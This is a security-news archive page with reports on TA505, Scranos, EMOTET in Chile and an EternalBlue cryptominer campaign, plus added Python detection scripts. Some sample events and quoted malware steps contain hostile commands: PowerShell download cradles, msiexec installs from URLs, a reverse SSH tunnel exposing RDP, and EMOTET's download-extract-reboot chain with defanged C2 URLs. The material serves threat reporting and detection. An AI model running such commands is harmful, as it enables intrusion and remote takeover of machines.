Category Archives: cyber crime

Russian TA505 threat actor targets financial entities worldwide

Russian financially motivated threat actor TA505 used remote access Trojans (RATs) in attacks on financial entities in the United States and worldwide.

Security experts at CyberInt uncovered a new campaign of a Russian financially motivated threat actor tracked as TA505. The hackers used remote access Trojans (RATs) in attacks aimed at financial entities in the United States and worldwide.

“CyberInt researchers have been tracking various activities following the spear-phishing campaign targeting large US-based retailers detected in December 2018,” reads the analysis published by Cyberint. “The research focused on scenarios with the same tactics, techniques and procedures (TTP) along with the repeated nefarious use of a ‘legitimate’ remote administration tool ‘Remote Manipulator System’ (RMS), developed by a Russian-based company ‘TektonIT’.”

TA505 was first documented by Proofpoint in 2017; the group has been active since at least 2015 and targets organizations in the financial and retail industries.

The group has run a large number of campaigns using weaponized Office and PDF documents to deliver well-known malware, including the Dridex banking Trojan, the tRat and FlawedAmmyy RATs, and the Philadelphia, GlobeImposter and Locky ransomware families.

Tracked by the research community as TA505, the Russian threat group is known for the use of banking Trojans such as Shifu and Dridex, as well as for the massive Locky ransomware campaigns observed several years ago.

In recent attacks the experts observed the group using new backdoors, including the modular tRat and ServHelper.

In campaigns carried out between December 2018 and February 2019, the TA505 group leveraged the Remote Manipulator System (RMS) backdoor to target financial institutions in Chile, India, Italy, Malawi, Pakistan and South Korea, and retailers in the United States.

In December 2018 the group also targeted large US retailers and organizations in the food and beverage industry with spear-phishing attacks. The phishing messages carried a weaponized Word document containing a Visual Basic for Applications (VBA) macro. The macro downloads a payload from the command and control (C&C) server; the last stage of the attack chain is the RMS RAT.

The investigation conducted by the researchers allowed them to uncover other campaigns conducted between December 2018 and March 2019.

Hackers hit targets in many countries worldwide, including Chile, India, Italy, Malawi, Pakistan and South Korea. Researchers believe that other attacks against targets in China, Great Britain, France and the United States could be attributed to the same threat actor.

The weaponized documents used in the attacks leverage Microsoft Windows Installer to fetch a payload from the C2 and execute it.

“This behaviour is consistent with other TA505 campaigns utilising a combination of weaponised Microsoft Office files containing either VBA macros or exploit code to spawn additional processes.” continues the analysis published by Cyberint. “Of the spreadsheet lures analysed in this campaign, four different C2 servers and payloads were identified, with each likely being unique to a specific target organization or victim cluster.”

Experts also observed the attackers using the ServHelper RAT since November 2018. It lets them set up a reverse SSH tunnel from the compromised machine and reach it over RDP through that tunnel.
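The chain described above (Office lure, macro, msiexec or PowerShell fetching the payload, then ServHelper's reverse SSH tunnel to RDP) is exactly what process-lineage telemetry catches well. The following is an added example, not Cyberint's code and not TA505 tooling: a small rule set in Python run over constructed Sysmon-style process-creation events (paths, hosts and the 198.51.100.x addresses are made up for this page), flagging an Office process spawning a script host or installer, msiexec pulling a package from a URL, a PowerShell download cradle, and a plink/ssh remote forward that lands on port 3389.

```python
"""Lineage rules for the TA505 delivery chain described above.

Added example, not Cyberint's code. The events below are constructed
Sysmon-style process-creation records (made-up paths, hosts and IPs);
the rules encode what the article describes: an Office document whose
macro spawns msiexec or PowerShell to pull a payload from a remote URL,
and a reverse SSH tunnel (plink/ssh -R) that exposes RDP on the victim.
"""
import re
from dataclasses import dataclass

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Script hosts and installers a macro typically hands off to
LOLBINS = {"msiexec.exe", "powershell.exe", "cmd.exe", "wscript.exe",
           "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
           "certutil.exe", "bitsadmin.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
CRADLE_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient",
                       re.IGNORECASE)
# "-R [bind:]port:127.0.0.1:3389": a remote forward that lands on the local RDP port
REVERSE_RDP_RE = re.compile(r"-R\s*\S*:3389(?:\s|$)")


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(ev: ProcEvent) -> list:
    """Return the names of every rule the event matches (empty list if none)."""
    hits = []
    parent, image = basename(ev.parent_image), basename(ev.image)
    if parent in OFFICE and image in LOLBINS:
        hits.append("office_spawned_lolbin")
        if image == "msiexec.exe" and URL_RE.search(ev.command_line):
            # msiexec /i http://...: Windows Installer fetches the package itself
            hits.append("msiexec_remote_package")
        if image == "powershell.exe" and CRADLE_RE.search(ev.command_line):
            hits.append("powershell_download_cradle")
    if image in {"ssh.exe", "plink.exe"} and REVERSE_RDP_RE.search(ev.command_line):
        hits.append("reverse_ssh_tunnel_to_rdp")
    return hits


def scan(events):
    """(index, hits) for every event that matched at least one rule."""
    out = []
    for i, ev in enumerate(events):
        hits = evaluate(ev)
        if hits:
            out.append((i, hits))
    return out


# Constructed sample telemetry; 198.51.100.0/24 is documentation address space.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\System32\msiexec.exe",
              "msiexec.exe /i http://198.51.100.7/invoice.msi /q"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r'"WINWORD.EXE" C:\Users\alice\Downloads\invoice.docx'),
    ProcEvent(r"C:\Windows\System32\svchost.exe",
              r"C:\ProgramData\plink.exe",
              "plink.exe -N -R 0.0.0.0:8443:127.0.0.1:3389 tunnel@198.51.100.9 -pw s3cr3t"),
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s.ps1')\""),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i C:\Users\alice\Downloads\7zip.msi"),
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx].command_line[:60], hits)
```

The last sample (a user installing an MSI from Explorer) is there to show the rules key on lineage, not on msiexec alone; the msiexec rule only fires when the parent is an Office process and the package argument is a URL.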

The report states that indicators of compromise identified in the US retail campaign are consistent with an attack against the Notary Chamber of Ukraine conducted by the same threat actor in December 2018.

At the time, the threat actor was delivering the RMS Trojan in spear-phishing attacks.

Further technical details on the attacks are included in the report published by Cyberint.

Pierluigi Paganini

(SecurityAffairs – TA505, hacking)

The post Russian TA505 threat actor targets financial entities worldwide appeared first on Security Affairs.

Part One: Understanding cyber security in accountancy

Emmy Hawker takes a deep dive into cyberspace, assessing how prepared accountancy firms and practices are for the ever-growing threat of cyber-crime. In June 2018, the UK’s technology sector was

The post Part One: Understanding cyber security in accountancy appeared first on The Cyber Security Place.

Crooks are selling “Digital Doppelgangers” to bypass anti-fraud protection

By Waqas

Financial Crimes to Reach an Unprecedented High by 2023 if Dark Web Marketplaces like Genesis Are Allowed to Operate, Researchers Claim. According to the latest research from Juniper Research, cybercriminals have developed a wide range of advanced tools to help users evade machine learning-based anti-fraud systems. On the other hand, Kaspersky Lab researchers have identified […]

This is a post from HackRead.com Read the original post: Crooks are selling “Digital Doppelgangers” to bypass anti-fraud protection

Scranos – A Cross Platform, Rootkit-Enabled Spyware rapidly spreading

Scranos is a powerful cross-platform rootkit-enabled spyware discovered while investigating malware posing as legitimate software like video players, drivers and even anti-virus products.

The Scranos rootkit malware was first discovered late last year, when experts at Bitdefender were analyzing a new password- and data-stealing operation built around a rootkit driver digitally signed with a possibly stolen certificate.

Despite the level of sophistication of the threat, the rootkit appears to be a work in progress; the experts pointed out that it is continually evolving.

“Last year, the Bitdefender Cyber Threat Intelligence Lab started analysis of a new password- and data-stealing operation based around a rootkit driver digitally signed with a possibly stolen certificate. The operation, partially described in a recent article by Tencent, primarily targeted Chinese territory until recently, when it broke out around the world,” reads the report published by Bitdefender. “Despite the sophistication, this attack looks like a work in progress, with many components in the early stage of development. Although the campaign has not reached the magnitude of the Zacinlo adware campaign, it is already infecting users worldwide.”

Scranos has a modular architecture, with many components still in an early stage of development, yet experts report that it is already infecting users worldwide. Its components can:

  • extract cookies and steal login credentials from multiple browsers (Google Chrome, Chromium, Mozilla Firefox, Opera, Microsoft Edge, Internet Explorer, Baidu Browser and Yandex Browser);
  • steal a user’s payment account details from their Facebook, Amazon and Airbnb pages;
  • send friend requests to other accounts and phishing messages containing malicious APKs from the victim’s Facebook account;
  • steal login credentials for the user’s Steam account;
  • download and execute any payload.

The malware is also able to inject JavaScript adware in Internet Explorer, install Chrome/Opera extensions to inject JavaScript adware on these browsers as well, exfiltrate browsing history, silently display ads or muted YouTube videos to users via Chrome, and subscribe users to YouTube video channels.

The malware spreads via Trojanized applications disguised as cracked software, or as legitimate software such as video players, drivers or even antivirus products. When executed, it installs a rootkit driver to hide the malware and ensure persistence, then connects to the C2 to download and install additional components.

Most of the infections have been observed in India, Romania, Brazil, France, Italy and Indonesia. According to the experts, the operation is in a consolidation stage: the first samples date back to November 2018, with a massive spike in December and January.

“The dropper, which doubles as a password stealer, installs a driver that provides persistence to all other components to be installed in the future. As this paper was written, the digital signature of the driver, issued to Yun Yu Health Management Consulting (Shanghai) Co., Ltd, had not been revoked on grounds of obvious fraudulent activity,” continues the report.

“The rootkit registers a Shutdown callback to achieve persistence. At shutdown, the driver is written to disk, and a start-up service key is created in the Registry.”

The infection process, as described by the experts:

  • The dropper steals cookies, login credentials and payment info with the help of specialized DLLs. It supports the most common browsers and targets Facebook, YouTube, Amazon and Airbnb. Data gathered is sent back to the C&C.
  • The dropper installs the rootkit.
  • The rootkit registers a Shutdown callback to achieve persistence. At shutdown, the driver is written to disk and a start-up service key is created in the Registry.
  • The rootkit injects a downloader into a svchost.exe process.
  • The downloader sends some info about the system to the C&C and receives download links.

The experts also shared technical details on payloads involved in the campaign:

Extension Installer Payload — This payload installs adware extensions in Chrome used to inject adware scripts in web pages visited by the user.

Browsing History Stealer Payload — This payload collects Chrome’s browsing history and sends it to the C&C encrypted with AES. The main dropper is able to steal browser cookies and login credentials from Google Chrome, Chromium, Mozilla Firefox, Opera, Microsoft Edge, Internet Explorer, Baidu Browser and Yandex. It can also steal cookies and login info from victims’ accounts on Facebook, YouTube, Amazon, and Airbnb.

YouTube subscriber payload — It is basically an adware file that manipulates YouTube pages by using Chrome in debugging mode. Some droppers even install Chrome if it is not installed on the infected machine. The payload hides the Chrome window on the desktop and taskbar, but its process is visible in Task Manager/Process Explorer. The operations are performed through debug commands.
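Two of the behaviours above are directly huntable: a kernel driver that persists through a start-up service key and is signed by a certificate that has no business on a driver, and Chrome being driven through its debugging interface. The block below is an added example written for this page, not Bitdefender's code. It runs over constructed data (made-up service names and paths standing in for what one would read from HKLM\SYSTEM\CurrentControlSet\Services, joined with the Authenticode signer of each image file) and uses the signer named in the report as the single watchlist entry. For Chrome only the --remote-debugging-port switch is checked; the report does not name the exact flags the payload passes, so that part is an assumption.

```python
"""Hunting checks for two Scranos behaviours described above.

Added example, not Bitdefender's code. The input is constructed: service
entries in the shape of HKLM\\SYSTEM\\CurrentControlSet\\Services\\<name>
(Type, Start, ImagePath) joined with the Authenticode signer of the image
file, plus a few process command lines. Check 1 flags kernel-driver
services that auto-start from outside the drivers directory, are unsigned,
or are signed by a certificate on a watchlist (the signer named in the
report is the one watchlist entry). Check 2 flags chrome.exe launched with
a remote-debugging port (assumed to be how "debugging mode" is reached).
"""
import re
from dataclasses import dataclass
from typing import List, Optional

SERVICE_KERNEL_DRIVER = 0x1              # Type value for a kernel-mode driver
AUTO_START = {0x0, 0x1, 0x2}             # SERVICE_BOOT_START, SERVICE_SYSTEM_START, SERVICE_AUTO_START
# ImagePath forms that resolve to %SystemRoot%\System32\drivers\<file>.sys
DRIVERS_DIR_RE = re.compile(
    r"^(?:\\\?\?\\)?(?:\\SystemRoot\\|%SystemRoot%\\|[A-Za-z]:\\Windows\\)?System32\\drivers\\[^\\]+\.sys$",
    re.IGNORECASE)
# Signer of the Scranos driver per the Bitdefender report (not revoked at the time of writing)
SIGNER_WATCHLIST = {"Yun Yu Health Management Consulting (Shanghai) Co., Ltd"}
CHROME_DEBUG_RE = re.compile(r"--remote-debugging-port=\d+", re.IGNORECASE)


@dataclass
class ServiceEntry:
    name: str
    type: int
    start: int
    image_path: str
    signer: Optional[str]    # None when the image carries no Authenticode signature


def driver_findings(svc: ServiceEntry) -> List[str]:
    findings = []
    if svc.type != SERVICE_KERNEL_DRIVER:
        return findings                  # user-mode services are out of scope here
    path = svc.image_path.strip('"')
    if svc.start in AUTO_START and not DRIVERS_DIR_RE.match(path):
        findings.append("autostart_driver_outside_drivers_dir")
    if svc.signer is None:
        findings.append("unsigned_driver")
    elif svc.signer in SIGNER_WATCHLIST:
        findings.append("driver_signer_on_watchlist")
    return findings


def chrome_findings(image: str, command_line: str) -> List[str]:
    if image.rsplit("\\", 1)[-1].lower() != "chrome.exe":
        return []
    return ["chrome_remote_debugging"] if CHROME_DEBUG_RE.search(command_line) else []


# Constructed samples (service names and paths are made up)
SAMPLE_SERVICES = [
    ServiceEntry("disk", 0x1, 0x0, r"System32\drivers\disk.sys", "Microsoft Windows"),
    ServiceEntry("drvsample", 0x1, 0x2, r"\??\C:\Windows\Temp\drvsample.sys",
                 "Yun Yu Health Management Consulting (Shanghai) Co., Ltd"),
    ServiceEntry("Spooler", 0x10, 0x2, r"C:\Windows\System32\spoolsv.exe", "Microsoft Windows"),
    ServiceEntry("oemfilter", 0x1, 0x1, r"\SystemRoot\System32\drivers\oemfilter.sys", None),
]
SAMPLE_PROCESSES = [
    (r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     r'"chrome.exe" --remote-debugging-port=9222 --user-data-dir=C:\Users\Public\prof https://www.youtube.com/'),
    (r"C:\Program Files\Google\Chrome\Application\chrome.exe", r'"chrome.exe" --profile-directory=Default'),
]

if __name__ == "__main__":
    for svc in SAMPLE_SERVICES:
        print(svc.name, driver_findings(svc))
    for image, cmd in SAMPLE_PROCESSES:
        print(chrome_findings(image, cmd))
```

The signer check is only as good as the watchlist; the location and signature checks are what generalize, since a driver written to a temp directory at shutdown and registered to auto-start is unusual regardless of who signed it.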

Further technical details on the other payloads, such as the Facebook Spammer Payload and the Android Adware App, are included in the report published by Bitdefender.

The report also includes the IoCs for this last campaign.

Pierluigi Paganini

(SecurityAffairs – scranos malware, malware)

The post Scranos – A Cross Platform, Rootkit-Enabled Spyware rapidly spreading appeared first on Security Affairs.

Romanian duo convicted of fraud scheme infecting 400,000 computers

Two Romanian hackers have been convicted of infecting 400,000 computers, most of them in the U.S., with malicious code and stealing millions of dollars from the victims.

Bogdan Nicolescu and Radu Miclaus were convicted of infecting 400,000 computers, most of them in the U.S. The malware was built to steal credentials, financial data and personal information, which the crooks then sold on dark web marketplaces.

The crooks spread the malware with emails purporting to come from legitimate entities such as Western Union, Norton AntiVirus and the IRS. The messages carried an attachment that, once opened, installed the malware on the victim’s computer.

“The defendants used stolen email credentials to copy a victim’s email contacts. They also activated files that forced infected computers to register email accounts with AOL,” reads the press release published by the DoJ. “The defendants registered more than 100,000 email accounts using this method. They then sent malicious emails from these addresses to the compromised contact lists. Through this method, they sent tens of millions of malicious emails.”

When victims with infected computers visited websites such as Facebook, PayPal or eBay, the malware intercepted the request and redirected the browser to a nearly identical website the defendants had created, where the account credentials the victim typed in were captured.

The two men also ran online auction fraud from email accounts created with the stolen credentials in the victims’ names, mined cryptocurrency on the infected machines, and stole money and cryptocurrency through credit card fraud.

The duo has been convicted of conspiracy to commit wire fraud, conspiracy to traffic in counterfeit service marks, aggravated identity theft, conspiracy to commit money laundering, and 12 counts each of wire fraud.

“A federal jury today convicted two Bucharest, Romania, residents of 21 counts related to their scheme to infect victim computers with malware in order to steal credit card and other information to sell on dark market websites, mine cryptocurrency and engage in online auction fraud, announced Assistant Attorney General Brian” reads the press release published by the DoJ.

“According to testimony at trial and court documents, Nicolescu, Miclaus, and a co-conspirator who pleaded guilty, collectively operated a criminal conspiracy from Bucharest, Romania.”

According to the authorities, the Romanian duo, along with a third co-conspirator who has pled guilty, operated their criminal conspiracy from Bucharest since 2007.

Sentencing is scheduled for August 24 before Chief Judge Patricia A. Gaughan in the Northern District of Ohio.

Pierluigi Paganini

(SecurityAffairs – Romanian Duo, cybercrime)

The post Romanian duo convicted of fraud scheme infecting 400,000 computers appeared first on Security Affairs.

Malware campaign uses multiple propagation methods, including EternalBlue

Hackers are using the EternalBlue exploit together with Living off the Land (LotL) techniques and obfuscated PowerShell scripts to deliver malware and a Monero cryptocurrency miner.

Security experts at Trend Micro have uncovered a malware campaign targeting Asian entities that uses the EternalBlue exploit together with Living off the Land (LotL) techniques and obfuscated PowerShell scripts to deliver malware and a Monero cryptocurrency miner.

The threat actors behind this campaign use the exploit leaked by the Shadow Brokers in 2017; EternalBlue has since been used by several malware families, including the WannaCry and NotPetya ransomware.

The same campaign was first observed in January by experts at Qihoo 360, at the time attackers hit Chinese targets leveraging the Invoke-SMBClient and the PowerDump open source tools.

Researchers observed that the recent attacks initially targeted Japanese users, later they also hit people in Australia, Taiwan, Vietnam, Hong Kong, and India.

“Instead of directly sending itself into all the systems connected, the remote command changes the firewall and port forwarding settings of the infected machines, setting up a scheduled task to download and execute an updated copy of the malware.” reads the analysis published by Trend Micro.

“The malware also uses the pass the hash method, wherein it authenticates itself to remote servers using the user’s hashed password. By using the Get-PassHashes command, the malware acquires the hashes stored in the machine, as well as the hashes of the weak passwords listed. After acquiring the hashes, the malware utilizes Invoke-SMBClient – another publicly available script – to perform file share operations using pass-the-hash.”

With the obtained hashes, the malware uses the Invoke-SMBClient script to perform file share operations on remote machines, such as deleting files dropped by older versions of the malware and gaining persistence by copying itself into the Windows Startup folder.

When the target uses a stronger password and the pass-the-hash attempt fails, the malware falls back to EternalBlue to propagate.

Once the malware has infected a machine, it will download an obfuscated PowerShell script from the command-and-control (C&C) server, that acts as dropper. The script also collects and exfiltrates the machine’s MAC address and the list of installed antimalware software.

“The downloaded PowerShell is a dropper, responsible for downloading and executing the malware’s components, most of which are copies of itself.” continues the analysis.

In the next stage, the malware will drop a Trojan strain detected by Trend Micro as TrojanSpy.Win32.BEAHNY.THCACAI that gathers other system information, including computer name, machine’s GUID, MAC address (again), OS version, graphics memory info, and system time.

The malware also downloads a PowerShell implementation of Mimikatz and attempts to log into database servers using weak SQL passwords, executing shell commands through xp_cmdshell once it gets access. It also scans IP blocks for vulnerable hosts and attempts to exploit them with EternalBlue.

A fifth component is an XMRig Monero cryptominer that is deployed using PowerShell and injected into its PowerShell process using the open source Invoke-ReflectivePEInjection tool.

“Considering the increasing popularity of PowerShell and more publicly available open-source codes, we can expect to see more complicated malware like these.” concludes Trend Micro. “And while system information being collected and sent back to the C&C may appear insignificant compared to directly stealing personally identifiable information, system information is unique to machines and may be used to trace, identify, and track users and activities.”

Pierluigi Paganini

(SecurityAffairs – EternalBlue, malware)

The post Malware campaign uses multiple propagation methods, including EternalBlue appeared first on Security Affairs.




Wikileaks founder Julian Assange arrested in London

By Uzair Amir

The United States is now requesting the United Kingdom to extradite Julian Assange. Wikileaks founder Julian Assange, 47, has been arrested by Met Police from the embassy of Ecuador in London after seven years of refuge over a now-dropped case of sexual assault. The arrest took place after Ecuadorian president Lenin Moreno withdrew Assange’s asylum for “repeatedly […]

This is a post from HackRead.com. Read the original post: Wikileaks founder Julian Assange arrested in London

80 Eye-Opening Cyber Security Statistics for 2019

It’s an interesting and challenging time to be working in the cyber security industry. By and large, research indicates that cybercrime is on the rise — news headlines support these

The post 80 Eye-Opening Cyber Security Statistics for 2019 appeared first on The Cyber Security Place.

[SI-LAB] EMOTET spread in Chile impacted hundreds of users and targeted financial and banking services

EMOTET spread in Chile targeted financial and banking services. SI-LAB detected hundreds of users that were impacted by this malware between March 18th and 26th of 2019.

The last days of March 2019 are making headlines due to a targeted cyber attack involving a new variant of the infamous EMOTET malware. This threat is known as a banking trojan that collects financial information by injecting malicious code into the victim’s computer.

EMOTET’s delivery has evolved over time; this wave, however, used the most common form: malicious documents or URL links placed inside the body of an email, sometimes disguised as an invoice or PDF attachment.

According to SI-LAB, a total of 176 users from Chile were affected by a broad cyber threat that occurred between March 18th and 26th of 2019. Once again, the main goal of this campaign involving EMOTET was to exfiltrate financial credentials from users’ computers in order to access financial and banking services geolocated in Chile.

The first phase, identified as “__Denuncia_Activa_CL.PDF.bat”, is responsible for operating a crucial part of this threat. That file was delivered via malscam campaigns around the world, and its source code is obfuscated in order to evade antivirus detection and complicate its analysis.

Interestingly, the first phase bypasses VirusTotal (VT) detections. With that, criminals achieved an important rule of thumb in the malware landscape: no detection. In fact, an old living-off-the-land technique was used, allowing the sample to become fully undetectable (FUD), which is the ultimate goal for malware authors.

The .bat file is a Windows batch script responsible for downloading a second stage from the Command & Control (C&C) server. The latter leverages the WinRAR/ACE vulnerability (CVE-2018-20250) to drop the malware itself into the Windows startup folder. Next, the infected machine reboots and the malware becomes persistent through the system startup.

The high-level workflow of this campaign is illustrated below.

Diagram: high-level workflow of the EMOTET campaign.

EMOTET was protected with a heavyweight commercial packer dubbed Themida. Themida introduced an additional protection layer that made the sample harder to analyze. Other restrictions were also coded to prevent its execution in certain scenarios: in this case, for instance, the malware authors introduced several anti-run checks related to the victims’ geolocation and language preferences, so that only computers configured for Spain/Chile were compromised.

The Themida packer has a large set of features that criminals value highly for protecting their threats. For example, it uses VM-protection techniques, debug protection, virtual machine emulation, anti-monitor techniques and anti-memory-patching (see all Themida features here).

The first alert related to this wave was observed on March 22nd by the Computer Security Incident Response Team (CSIRT) of the Ministry of the Interior of Chile.

“Preliminary information collected allows us to determine that the following URLs and the following IP addresses must be blocked, unless otherwise indicated,” the CSIRT Ministry of the Interior states.

“Based on information obtained from internal sources, the cybersecurity alert situation was identified by an incident related to malicious software called EMOTET affected by the relevant sectors of the economy” – CSIRT Chile.

CSIRT released a comprehensive list of IP addresses associated with EMOTET that had to be blocked. A national alert was sent (shown below) and can be consulted at this URL.

National alert communication issued by CSIRT Chile (image).

SI-LAB detected that this attack started some days before the alerts were published. The second malware phase (denuncias.rar), which used the WinRAR/ACE vulnerability (CVE-2018-20250) to drop the malware itself, was uploaded by the criminals to the opendir C2 server on March 18th, 2019. We can note below, in the Technical Analysis, that the malware was uploaded again into another web folder on March 21st, perhaps an update performed by its operators to improve functionality or to fix some bug.

As mentioned, EMOTET only executes on victims’ computers with Spain/Chile configured as their primary language, and this can be an indicator of a targeted attack.

After several rounds of analysis, we found that some Chilean financial and banking organizations were targeted, including:

  • BBVAnet
  • Santander
  • CorpBanca
  • Banco Falabella
  • BCI
  • Banco Security
  • Banco Estado
  • Banco de Chile

When the malware executes without any restrictions, i.e., in a non-virtualized environment, some information from the victim’s computer is sent to the C2 server. The data includes the date/hour of infection, the remote IP of the victim’s computer, the OS version and the antivirus name.

This information was available online on the opendir C2 server, and SI-LAB analysed the data in order to understand the total number of infections and victims impacted by this targeted attack.

In detail, we found that 1089 users were impacted by this malware between March 18th and 26th, 2019.

We built a GeoMap of Threats that aggregates the victims’ IP addresses collected from all the data on the opendir C2 server, grouped by geolocation. Color intensity is correlated with the number of infections, the darkest red corresponding to 175 infections in Chile.

GeoMap of Threats: EMOTET victims of the cyber threat in Chile (map).

As indicated on the GeoMap of Threats, Chile, USA, Germany and France were the countries with most hits observed by SI-LAB. From a total of 1089 infections, 175 victims were impacted in Chile, 162 in USA, 137 in Germany and 132 in France.

The governmental agency CSIRT and the National Cybersecurity System of Chile are currently fighting this growing threat and have been working on raising awareness among users in the country. They encourage users to follow their computer security alerts.

For more details and complete analysis of this malicious campaign see the Technical Analysis below.

Technical Analysis


Threat name: __Denuncia_Activa_CL.PDF.bat
MD5: 1e541b14b531bcac70e77a012b0f0f7f
SHA1: 0ca0cd36fb4c9dfeb3e325a01cfb7b75413d1f81
First submission: 2019-03-22 00:39:43


The last weeks of March 2019 were marked for the wrong reasons: a global cyber threat targeted financial institutions and banks from Chile via the EMOTET banking trojan.

This campaign was conducted via an initial malscam wave that placed malicious documents or URL links inside the body of an email, sometimes disguised as an invoice or PDF attachment.

According to SI-LAB, 1089 users were impacted by this wave, 176 of them in Chile. This malware is not new and, once again, the main goal was the exfiltration of credentials from users in order to access financial and banking services geolocated in Chile.

The first malware phase, identified as “__Denuncia_Activa_CL.PDF.bat”, acts as the conductor of an operation carefully planned by the criminals. This file was delivered via malscam campaigns around the world, and its code is obfuscated in order to evade antivirus detection and make its analysis harder. Figure 1 (below) shows the batch script encoded in little-endian UTF-16.

Figure 1: EMOTET malware obfuscated (encoded in Little-endian UTF-16) — the first phase.

After a few decoding rounds it was possible to recover the malware source code in ASCII, shown below.

Figure 2: EMOTET malware deobfuscated — the first phase.

In general, the malicious batch script performs the following actions:

1. Generates a random name for the 2nd stage (dropper)

First, the malware generates a random name to rename the 2nd file downloaded from C2 server (the stage that executes the WinRar/Ace vulnerability — CVE-2018-20250). The latter will drop the EMOTET itself onto the Windows startup folder (discussed later).

In detail, on lines 33, 34 and 35 we can observe that the second stage is downloaded to the victim’s Downloads folder. The next image presents the output generated by the batch file.

Figure 3: Malware source-code output – the first phase.

2. Drops 2nd stage: PowerShell command is executed to drop the WinRar exploit ‘denuncias.rar’ file.

  PowerShell -windowstyle hidden -Command "(New-Object Net.WebClient).DownloadFile('%downloadurl%'

The 2nd stage is downloaded from the C2 server, renamed (“25RqcZpQ3.rar”) and placed in the “C:\Users\root\Downloads” folder.

Figure 4: Download path – the first phase.

As shown, this file is downloaded from an opendir C2 server. Note that the C2 server hosts this file in two different directories, namely:

  1. http://www.triosalud[.]cl/wp/wp-content/uploads/2019/02/denuncias.rar
  2. http://www.triosalud[.]cl/wp/wp-content/uploads/2019/03/denuncias.rar (URL hardcoded in the 1st stage of the malware)

Figure 5: 2nd stage available to download in two different directories.

3. Extracts EMOTET via WinRAR: after the 2nd stage (‘denuncias.rar’) is downloaded, the archive is processed by WinRAR and the malware itself (‘Integrity.exe’, EMOTET) is dropped by the WinRAR/ACE vulnerability into the Windows startup folder; see lines 38–42 in Figure 2.

  "%ProgramFiles%\WinRAR\winRar.exe" x -y -c "%downloadpath%\%arch%" "%downloadpath%"

4. Pings for delay simulation

  ping 127.0.0.1 -n 1 > nul

5. Reboot for malware persistence

Once the command shutdown -r is executed, Windows will reboot. This step establishes the malware’s persistence, since the 2nd stage placed the extracted EMOTET in the Windows startup folder. While a normal reboot by the user would have the same effect, for some reason this campaign does not wait for the user to initiate one.
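As an added example (not part of the original analysis, and not the campaign’s own script), the following Python triage helper does what the write-up describes for Figures 1 and 2 from a defender’s side: it decodes a UTF-16LE encoded batch file back to readable text and reports which of the five steps above it contains, with line numbers and any literal URLs. The embedded batch script is constructed for the example; its URL and file names are placeholders, not the campaign’s indicators.

```python
import re

# Constructed sample of a first-stage batch script, modelled on the five actions
# listed above (random name, PowerShell download, WinRAR extraction, ping delay,
# forced reboot). The URL and file names are placeholders, NOT the campaign's
# real indicators.
SAMPLE_BAT_TEXT = r"""@echo off
set downloadurl=http://c2.example.invalid/uploads/denuncias.rar
set downloadpath=%USERPROFILE%\Downloads
set arch=%RANDOM%%RANDOM%.rar
PowerShell -windowstyle hidden -Command "(New-Object Net.WebClient).DownloadFile('%downloadurl%', '%downloadpath%\%arch%')"
"%ProgramFiles%\WinRAR\winRar.exe" x -y -c "%downloadpath%\%arch%" "%downloadpath%"
ping 127.0.0.1 -n 1 > nul
shutdown -r -t 0
"""
# The same script as it would sit on disk: UTF-16LE with a byte-order mark, the
# encoding shown in Figure 1 (plain-text signature rules often miss it).
SAMPLE_BAT_UTF16LE = b"\xff\xfe" + SAMPLE_BAT_TEXT.encode("utf-16-le")


def decode_batch(raw: bytes) -> str:
    """Recover readable text from a batch file regardless of its encoding."""
    if raw.startswith(b"\xff\xfe"):
        return raw[2:].decode("utf-16-le")
    if raw.startswith(b"\xfe\xff"):
        return raw[2:].decode("utf-16-be")
    if raw.startswith(b"\xef\xbb\xbf"):
        return raw[3:].decode("utf-8")
    # No BOM: NUL bytes at every odd offset are a strong sign of BOM-less UTF-16LE.
    if len(raw) >= 8 and raw[1:8:2] == b"\x00\x00\x00\x00":
        return raw.decode("utf-16-le")
    return raw.decode("latin-1")


# One pattern per step of the chain described in the write-up.
STAGE_PATTERNS = {
    "powershell_download": re.compile(r"powershell.*?downloadfile\(", re.I),
    "hidden_window": re.compile(r"-windowstyle\s+hidden", re.I),
    "winrar_extract": re.compile(r"winrar\.exe\W+x\b", re.I),
    "ping_delay": re.compile(r"\bping\s+127\.0\.0\.1\b", re.I),
    "forced_reboot": re.compile(r"\bshutdown\s+[-/]r\b", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)


def triage_batch(raw: bytes) -> dict:
    """Decode a .bat file and report which steps of the chain it contains,
    with the line number of the first match for each, plus any literal URLs."""
    lines = decode_batch(raw).splitlines()
    stages = {}
    for name, pattern in STAGE_PATTERNS.items():
        for lineno, line in enumerate(lines, 1):
            if pattern.search(line):
                stages[name] = lineno
                break
    core = ("powershell_download", "winrar_extract", "forced_reboot")
    return {
        "urls": [u for line in lines for u in URL_RE.findall(line)],
        "stages": stages,
        "full_chain": all(step in stages for step in core),
    }


if __name__ == "__main__":
    print(triage_batch(SAMPLE_BAT_UTF16LE))
```

The decoder is the important part: a hunting rule that greps for `DownloadFile(` in a UTF-16 file never matches, because every ASCII character is followed by a NUL byte. Decoding first, then matching, is what makes the chain visible.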

Upon reboot, the malicious program “Integrity.exe” (EMOTET malware) gets into action and connects to the Command and Control (C&C) server.

Figure 6: Infection graph generated and extracted from Virus Total.

